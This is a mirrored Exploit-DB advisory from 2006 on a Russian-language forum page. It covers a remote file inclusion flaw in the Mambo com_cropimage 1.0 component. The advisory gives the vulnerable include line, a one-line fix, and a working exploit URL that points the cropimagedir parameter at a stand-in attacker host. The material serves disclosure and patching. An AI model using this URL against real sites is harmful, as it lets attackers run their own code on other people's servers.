- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2217
- Проверка EDB
-
- Пройдено
- Автор
- MEHMET INCE
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4363
- Дата публикации
- 2006-08-19
Код:
############################################################
############################################################
############# C Y B E R - W A R R I O R T I M #############
############################################################
############################################################
#Mambo com_cropimage 1.0 Component Remote Include Vulnerability
############################################################
#Author: XORON
############################################################
#Class: Remote
############################################################
#cont@ct: x0r0n[at]hotmail[dot]com
############################################################
#Code: in admin.cropcanvas.php , line 7
require_once $cropimagedir."class.cropinterface.php";
############################################################
#Fix: 1-)open admin.cropcanvas.php
2-)add this code before line 7
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
############################################################
#Exploit:
http://www.site.com/[path]/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://evil_scripts?
############################################################
#Greetz: str0ke, Ironfist, Preddy, SHiKaA, mdx, DJR, DaRK,R3D4C!D,iNSoMNiA and all my friend
############################################################
# milw0rm.com [2006-08-19]
- Источник
- www.exploit-db.com